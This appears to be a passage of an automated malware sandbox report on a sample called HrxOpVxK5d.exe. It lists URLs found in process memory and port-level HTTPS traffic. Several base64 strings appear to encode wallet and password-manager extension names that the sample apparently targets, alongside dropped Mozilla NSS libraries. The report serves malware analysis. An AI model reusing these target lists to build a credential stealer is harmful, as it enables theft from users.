Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://music.apple.com
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://music.yandex.com
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://ntp.msn.cn/edge/ntp
Source: 000003.log9.15.dr, 000003.log3.15.dr	String found in binary or memory: https://ntp.msn.com/
Source: 000003.log9.15.dr	String found in binary or memory: https://ntp.msn.com/0
Source: QuotaManager.15.dr	String found in binary or memory: https://ntp.msn.com/_default
Source: 000003.log9.15.dr, 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp
Source: 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: Session_13375590446238943.15.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: QuotaManager.15.dr	String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
Source: msedge.exe, 0000000D.00000002.1510846002.0000152802514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.net/
Source: chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000008.00000003.1358810666.00000F9C024A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://open.spotify.com
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://outlook.live.com/mail/0/
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://outlook.office.com/mail/0/
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/AddSession
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/OAuthLogin
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/OAuthLoginP
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
Source: chrome.exe, 00000008.00000003.1329800088.00000F9C025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1333048708.00000F9C03360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1330145538.00000F9C03308000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://sb.scorecardresearch.com/
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://srtb.msn.com/
Source: chrome.exe, 00000008.00000003.1334791078.00000F9C0253C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000008.00000003.1362826974.00000F9C03EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1354718747.00000F9C03D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1355376953.00000F9C03DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1354274186.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: HrxOpVxK5d.exe, 00000000.00000003.1578461410.0000000023699000.00000004.00000020.00020000.00000000.sdmp, GHJJDGHCBGDHIECBGIDAEHCGDG.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HrxOpVxK5d.exe, 00000000.00000003.1578461410.0000000023699000.00000004.00000020.00020000.00000000.sdmp, GHJJDGHCBGDHIECBGIDAEHCGDG.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://tidal.com/
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://twitter.com/
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://vibe.naver.com/today
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://web.telegram.org/
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://web.whatsapp.com
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp, IIJEBFCFIJJJEBGDBAKE.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.deezer.com/
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: EBFBKKJE.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000008.00000003.1334791078.00000F9C0253C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000008.00000003.1334791078.00000F9C0253C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000008.00000003.1334791078.00000F9C0253C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000008.00000003.1349125008.00000F9C02EB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: EBFBKKJE.0.dr, Web Data.15.dr, JJJJKEHC.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000008.00000003.1362826974.00000F9C03EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1354718747.00000F9C03D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1355376953.00000F9C03DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1354274186.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000008.00000003.1330145538.00000F9C03308000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000008.00000003.1334791078.00000F9C0253C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 00000008.00000003.1352328383.00000F9C037AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1352041440.00000F9C03774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1352252922.00000F9C0378C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1352216181.00000F9C03784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1352087081.00000F9C03778000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1351999219.00000F9C03770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1351945577.00000F9C03760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1352174607.00000F9C03780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1352131143.00000F9C0377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000008.00000003.1334791078.00000F9C0253C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000008.00000003.1334791078.00000F9C0253C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000008.00000003.1354845044.00000F9C03E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1362826974.00000F9C03EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1355376953.00000F9C03DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1354274186.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1355119550.00000F9C03E18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.ciOLm-Jy21Y.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.gyN29IQRsEA.L.W.O/m=qmd
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.iheart.com/podcast/
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.instagram.com
Source: HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp, IIJEBFCFIJJJEBGDBAKE.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.last.fm/
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.messenger.com
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HrxOpVxK5d.exe, 00000000.00000003.1578461410.0000000023699000.00000004.00000020.00020000.00000000.sdmp, GHJJDGHCBGDHIECBGIDAEHCGDG.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: HrxOpVxK5d.exe, 00000000.00000003.1578461410.0000000023699000.00000004.00000020.00020000.00000000.sdmp, GHJJDGHCBGDHIECBGIDAEHCGDG.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: HrxOpVxK5d.exe, 00000000.00000003.1578461410.0000000023699000.00000004.00000020.00020000.00000000.sdmp, GHJJDGHCBGDHIECBGIDAEHCGDG.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/olution:
Source: HrxOpVxK5d.exe, 00000000.00000003.1578461410.0000000023699000.00000004.00000020.00020000.00000000.sdmp, GHJJDGHCBGDHIECBGIDAEHCGDG.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: HrxOpVxK5d.exe, 00000000.00000003.1578461410.0000000023699000.00000004.00000020.00020000.00000000.sdmp, GHJJDGHCBGDHIECBGIDAEHCGDG.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: HrxOpVxK5d.exe, 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
Source: 2cc80dabc69f58b6_1.15.dr	String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.office.com
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.tiktok.com/
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://www.youtube.com
Source: c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	String found in binary or memory: https://y.music.163.com/m/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 53180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 53099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 53179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 53042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 53134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 53157 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
